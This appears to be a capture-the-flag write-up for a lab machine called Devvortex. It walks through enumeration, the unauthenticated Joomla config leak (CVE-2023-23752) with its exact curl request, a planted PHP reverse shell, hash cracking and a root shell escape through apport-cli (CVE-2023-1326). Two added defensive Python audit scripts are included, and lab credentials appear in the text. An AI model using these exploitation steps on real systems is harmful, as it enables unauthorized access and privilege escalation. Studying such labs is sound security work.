This article details the penetration testing process conducted on a Linux system named "Devvortex". An Nmap scan revealed open SSH and HTTP ports, followed by the use of the FFUF tool for subdomain and directory discovery. After locating the Joomla admin login page, the CVE-2023-23752 vulnerability was exploited to obtain administrator credentials. Further steps involved adding a PHP reverse shell to retrieve MySQL database credentials, cracking user hashes to obtain privileged user credentials, and finally achieving root privileges by using sudo to execute the apport-cli tool and exploiting the CVE-2023-1326 vulnerability. The article summarizes the key steps and vulnerabilities leveraged during the penetration test.
Information Gathering
# Nmap 7.98 scan initiated Sat Dec 27 09:08:15 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 15.115 days (since Fri Dec 12 06:22:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 09:08:31 2025 -- 1 IP address (1 host up) scanned in 15.48 seconds
Vulnerability Analysis
Since every page on the main site is static, the next step is to look for virtual hosts by fuzzing the Host header.
➜ Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]
Opening dev.devvortex.htb shows another static-looking site, so we fuzz for subdirectories.
➜ Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
http://dev.devvortex.htb/administrator/ presents the Joomla Administrator Login page; searching for Joomla vulnerabilities turns up CVE-2023-23752.
The Joomla source on GitHub shows where the version manifest lives: https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml
Fetching http://dev.devvortex.htb/administrator/manifests/files/joomla.xml from the target reports version 4.2.6, which falls in the range affected by CVE-2023-23752.
Exploitation (User Flag)
➜ Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq
The unauthenticated response discloses the credentials lewis:P4ntherg0t1n5r3c0n##
After logging into the administrator panel with them, we add a PHP reverse shell to System > Site Templates > Cassiopeia Details and Files > error.php
From the resulting shell, ss -tlpn shows ports 3306 and 33060 listening, so MySQL is running locally.
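The disclosure chain above (a readable version manifest, then an unauthenticated config endpoint) can be turned into a self-check for site owners. The following Python is an added example, not code from this write-up or from the Joomla project: it parses a constructed copy of joomla.xml, compares the version against the affected range (4.0.0 through 4.2.7, fixed in 4.2.8), and inspects a constructed copy of the endpoint's JSON for configuration keys that should never be public. All sample values are placeholders, not the target's real data.

```python
"""Audit helper (added example): Joomla version check plus a scan of the
/api/index.php/v1/config/application response for leaked config keys."""
import json
import re
import xml.etree.ElementTree as ET

# Constructed sample of administrator/manifests/files/joomla.xml, trimmed to
# the elements this check needs (a real manifest carries many more).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="UTF-8"?>
<extension type="file" method="upgrade">
    <name>files_joomla</name>
    <author>Joomla! Project</author>
    <version>4.2.6</version>
    <description>FILES_JOOMLA_XML_DESCRIPTION</description>
</extension>
"""

# Constructed sample of the JSON an unpatched site returns for
# /api/index.php/v1/config/application?public=true. The shape follows the
# curl | jq step above; the values are placeholders.
SAMPLE_API_RESPONSE = json.dumps({
    "links": {"self": "/api/index.php/v1/config/application"},
    "data": [
        {"type": "application", "id": 224, "attributes": {"offline": False, "id": 224}},
        {"type": "application", "id": 224, "attributes": {"user": "dbuser_placeholder", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"password": "dbpass_placeholder", "id": 224}},
        {"type": "application", "id": 224, "attributes": {"db": "joomla_db", "id": 224}},
    ],
})

FIRST_AFFECTED = (4, 0, 0)   # the web services API appeared in Joomla 4.0
FIXED_VERSION = (4, 2, 8)    # CVE-2023-23752 was fixed in Joomla 4.2.8

# configuration.php properties that must never be readable anonymously
SENSITIVE_KEYS = {"user", "password", "db", "host", "dbprefix",
                  "secret", "smtpuser", "smtppass"}


def parse_version(manifest_xml):
    """Return the (major, minor, patch) tuple from a joomla.xml manifest."""
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    node = root.find("version")
    if node is None or not node.text:
        raise ValueError("manifest has no <version> element")
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+).*", node.text.strip())
    if m is None:
        raise ValueError("unrecognised version string: %r" % node.text)
    return tuple(int(x) for x in m.groups())


def version_in_affected_range(version):
    """True for 4.0.0 <= version < 4.2.8."""
    return FIRST_AFFECTED <= version < FIXED_VERSION


def leaked_attributes(api_body):
    """Return the sorted sensitive keys present in the endpoint's JSON body."""
    doc = json.loads(api_body)
    leaked = set()
    for item in doc.get("data", []):
        for key in item.get("attributes", {}):
            if key in SENSITIVE_KEYS:
                leaked.add(key)
    return sorted(leaked)


def assess(manifest_xml, api_body):
    """Combine both signals into a single verdict dictionary."""
    version = parse_version(manifest_xml)
    leaked = leaked_attributes(api_body)
    return {
        "version": ".".join(str(x) for x in version),
        "vulnerable_version": version_in_affected_range(version),
        "leaked_keys": leaked,
        "leaks_credentials": bool({"user", "password"} & set(leaked)),
    }


if __name__ == "__main__":
    print(json.dumps(assess(SAMPLE_MANIFEST, SAMPLE_API_RESPONSE), indent=2))
```

In a real audit the two inputs would be fetched from your own site; a manifest inside the affected range is reason enough to patch, and any sensitive key in the endpoint's response means the database password must be rotated as well, since it may already have been read.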
www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';
Log into the database with mysql -u lewis -p, using the password from configuration.php.
Enumerating the database yields the following user row:
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
Cracking the bcrypt hash gives the credentials logan:tequieromucho
Privilege Escalation (Root Flag)
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11
Searching for this apport-cli version turns up CVE-2023-1326.
logan@devvortex:~$ sudo /usr/bin/apport-cli -f
# enter 2
# enter 1 (or any option)
# enter V (view the report)
# enter !/bin/bash at the pager prompt
This drops into a root shell.
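The sudo -l output above is exactly what a sudoers audit should catch before an attacker does. The following Python is an added example, not code from this write-up: it parses sudo -l output in the format shown (the sample is constructed, with two extra rules added for contrast) and flags rules whose command is known to hand control to a pager or editor, which is the mechanism behind CVE-2023-1326. The list of binaries is illustrative, not exhaustive.

```python
"""Sudoers exposure audit (added example): flag sudo rules granting
binaries that spawn a pager or editor and so offer a shell escape."""
import re

# Constructed `sudo -l` output in the same layout the write-up shows.
SAMPLE_SUDO_L = """Matching Defaults entries for logan on devvortex:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User logan may run the following commands on devvortex:
    (ALL : ALL) /usr/bin/apport-cli
    (root) NOPASSWD: /usr/bin/systemctl status nginx
    (ALL) /usr/bin/id
"""

# Binaries that drop into a pager or editor and therefore let the user run
# `!cmd` or `:!cmd` as the run-as user. apport-cli is listed because its
# report viewer ("V") pages the report through the system pager, which is
# what CVE-2023-1326 abuses. Illustrative, not exhaustive.
PAGER_SPAWNERS = {
    "apport-cli": "report viewer pages output (CVE-2023-1326)",
    "less": "pager with ! shell escape",
    "more": "pager with ! shell escape",
    "man": "invokes the system pager",
    "systemctl": "status output goes through a pager (CVE-2023-26604)",
    "vi": "editor with :! shell escape",
    "vim": "editor with :! shell escape",
}

# "(runas) TAG: TAG: /path/to/command args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_l(text):
    """Return [(runas, tags, command)] for each command rule in sudo -l output."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True  # everything after this header is a rule
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if m:
            tags = [t.strip(": ") for t in m.group("tags").split(":") if t.strip()]
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def audit(text):
    """Return a finding dict for every rule whose binary is a known pager spawner."""
    findings = []
    for runas, tags, cmd in parse_sudo_l(text):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in PAGER_SPAWNERS:
            findings.append({
                "runas": runas,
                "command": cmd,
                "nopasswd": "NOPASSWD" in tags,
                "why": PAGER_SPAWNERS[binary],
            })
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L):
        print("%-40s runas=%-10s nopasswd=%-5s %s"
              % (f["command"], f["runas"], f["nopasswd"], f["why"]))
```

Remediation is to remove such rules or replace them with a wrapper that does not page, to update apport to a release that addresses CVE-2023-1326, and, where a pager cannot be avoided, to run it in secure mode (less honours LESSSECURE=1, which disables the ! escape). The NOPASSWD flag is reported separately because it removes the last remaining hurdle, the user's own password.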
Lessons Learned